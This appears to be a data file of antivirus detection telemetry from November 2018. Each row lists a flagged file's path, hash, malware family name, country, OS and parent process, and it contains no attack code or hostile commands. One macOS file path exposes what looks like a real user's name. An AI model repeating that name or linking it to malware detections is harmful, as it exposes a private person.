  Row(detection=Row(filename='avscan-20181102-003101-4bdce3d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6e0c13b9\\AVSCAN-20181102-002939-3FC510D6\\AVSCAN-20181102-003101-4BDCE3D9', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='LB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:31:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='presentation template russian.exe', filepath='F:\\мок\\Presentation template russian.exe', filesize=1920000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='4902b05008f9af462000f77cfbacea19d9492e22cca80cc5c9f07d2c5701de32', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T16:15:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='65cca0d7b8d1990217f665a6f68376c406723029e08a6c501a0bc27b41674cc7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\65CCA0D7B8D1990217F665A6F68376C406723029E08A6C501A0BC27B41674CC7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='65cca0d7b8d1990217f665a6f68376c406723029e08a6c501a0bc27b41674cc7', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:17:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-173734-17a67344', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b1ca6323\\AVSCAN-20181101-173623-0DCCBA13\\AVSCAN-20181101-173734-17A67344', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:37:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151253-20751e5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151253-20751E5C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:12:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\gm3ltoksmkj\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='LA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:15:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='32d6.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\32D6.tmp', filesize=896000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='f1fdf5a690618f86263b03a073592cd58c12fbca0354d113ecb97bdfe419cc72', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dispense.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\INFORMATICA\\ECDL\\Dispense.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:23:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='altri qrsp.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\ALTRI QRSP.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:01:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='corso carvico.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\CORSO CARVICO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:22:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\BKP HD\\Lixo 2\\Desktop 2015\\BKP Servidor\\Caio\\Samsung Preto\\BLUETOOTH\\Broadcom\\Win32\\Setup.exe', filesize=948000, name='W32/Neshta.A.#M1.#R1'), hash='c81005e719178679bfca09c24ca4ca34988510dc79fbe8af5199e46013f04d02', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T12:36:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='r2speedcheckz46.exe.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Program Files (x86)\\ver1SpeedCheck\\r2SpeedCheckz46.exe.vir', filesize=512000, name='HEUR/AGEN.1015012.#M1.#R1'), hash='d278166de22e4abe16dc3191465b6729c27d64150e466b3dd531a99a23ebc945', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:24:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='854a52e5c13cc677924779e3bc483154709e618e25c5cf47fc0ab6e3d25c1040', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='images.scr', filepath='C:\\images.scr', filesize=0, name='TR/Dropper.Gen.#M2.#R7620'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:47:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194430-8a03136d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_20e350d0\\AVSCAN-20181101-194214-7E13D51A\\AVSCAN-20181101-194430-8A03136D', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:45:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\ojaqyzt05c4\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1539186467.5bbe1f2321df8', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\MR\\1845663.exe', parentsize=664576, timestamp='2018-11-01T11:28:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-132823-13dc4714', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_738a12ab\\AVSCAN-20181101-132647-066AE628\\AVSCAN-20181101-132823-13DC4714', filesize=832000, name='TR/Snarasite.ddb5d1.#M1.#R1'), hash='ddb5d1dfe905739163b3a9918b8e21a82a3cfb7346897a164f04a5521089c6c3', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T06:28:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212121-d8742f6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212121-D8742F6A', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:21:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cv formatori e allievi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\cv formatori e allievi\\cv formatori e allievi.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:21:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='test diritto.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\ENGIM\\test diritto.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:23:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mylbotmslqts.bat', filepath='E:\\mylbotmslqts.bat', filesize=512000, name='TR/Taranis.2886.#M0.#R0'), hash='eeb30022f7c3503064471543d222174092dacb7e964ee1ea21f0c4fe8a60e3ec', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T03:29:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142632-720e5cc6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_81949114\\AVSCAN-20181101-085743-41FE8D83\\AVSCAN-20181101-142632-720E5CC6', filesize=320000, name='HEUR/APC.#M1.#R1'), hash='e1e7c88cdfd27778cf4e4b7f08f96cc93f2931aa3a672ebd784a5065bf6a3548', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:26:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095018-41d4dca0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095018-41D4DCA0', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:50:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094553-0f1c37c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094553-0F1C37C9', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:46:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194604-4589288e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194604-4589288E', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:46:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='powershell.exe', filepath='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='9a4079b38c42774a86baa3a839e2a0458d874a6dfd75183e1b58125dddc0c650', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T19:32:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:08:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131330-21760a4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131330-21760A4A', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:13:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='devcon.exe', filepath='C:\\Program Files\\PowerISO\\devcon.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='6662e2a6270abe945268f0838b32faeaac34543fd8b5fcf417a2233103ad1529', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=322464, timestamp='2018-11-04T13:22:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-07-39-33.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T23:50:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0010757.exe', filepath='h:\\system volume information\\_restore{d91319e2-a444-4f72-ae88-de668da52f71}\\rp2\\A0010757.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='ac3ad7f61f6dc403b5f27868d83c18089121ab71f92f18e1144cbba694fce2c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:37:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp5484751\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:T\\\\\\/ZhdDu0ExtMx3ZpYqIODFRnjg \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\aTube_Catcher_2627213816.exe', parentsize=2629936, timestamp='2018-11-04T16:42:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195830-10b7b06e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c6048dd9\\AVSCAN-20181104-195732-0A9CA371\\AVSCAN-20181104-195830-10B7B06E', filesize=128000, name='TR/Krypt.lkfna.#M1.#R1'), hash='59a81ef27e74c2daa7f02178ab82d5925ba9e7be88bf43ce249b8f116e8914a5', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:58:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T07:48:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00018f8a', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00018f8a', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:08:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T08:12:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='plugin.dll', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Anubis-Lineage Mobile Bot\\plugin.dll', filesize=2560000, name='TR/BHO.Gen.#M300.#R3363'), hash='5da2bc60bcb4645cc005ccad3fbd9a109dbaa948506a9ccaab246c034bd5aa30', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:24:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173253-3178fefa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-173253-3178FEFA', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:32:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='1f0f8450.exe', filepath='C:\\programdata\\{b2b054cf-4e79-e7da-28ad-06720d3b5471}\\1f0f8450.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='7de1621fbf1c889c2c0390486dabe9c1bbd63e8fd93bb564ff086324d9f9f8f6', metadata=Row(cmdline=None, country='OM', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:05:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T05:14:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194945-47b2e2bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ae037767\\AVSCAN-20181104-194253-2D6AABD4\\AVSCAN-20181104-194945-47B2E2BF', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:49:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173316-3555a4fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-173316-3555A4FD', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:33:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='0f905fa19074f5ad6fda3c36358ce9aae29775829eb75ffa88060831bc9ea942', metadata=Row(cmdline='\\\\\\/Embedding', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T03:43:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0002427a', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0002427a', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:45:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crack.exe', filepath='\\\\?\\E:\\Red Alert 3\\Crack.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='35ec75e1fd61924d3d9d45c805acbd64d65439e4009d6d44a260fbb50b9a2c1d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:46:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='devising.exe', filepath='C:\\Users\\X\\AppData\\Local\\devising.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='93901ed772329c1a7423de0f6baaf4b8a57d37e25de043795df0c3d2a043d292', metadata=Row(cmdline='-k netsvcs -p', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-04T06:41:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001f48f', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001f48f', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:22:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204740-d1d0fbd0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-204740-D1D0FBD0', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:47:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0182314.exe', filepath='d:\\system volume information\\_restore{a0838581-84a6-4d91-8040-c33e0d667479}\\rp97\\A0182314.exe', filesize=256000, name='SPR/PowerReg.b1c843.#M1.#R1'), hash='b1c84398ff562cf2028555d8d497a372dc65e0739a8ec7b771608fd2667199c5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T04:20:32Z'), dt=datetime.date(2018, 11, 4)),
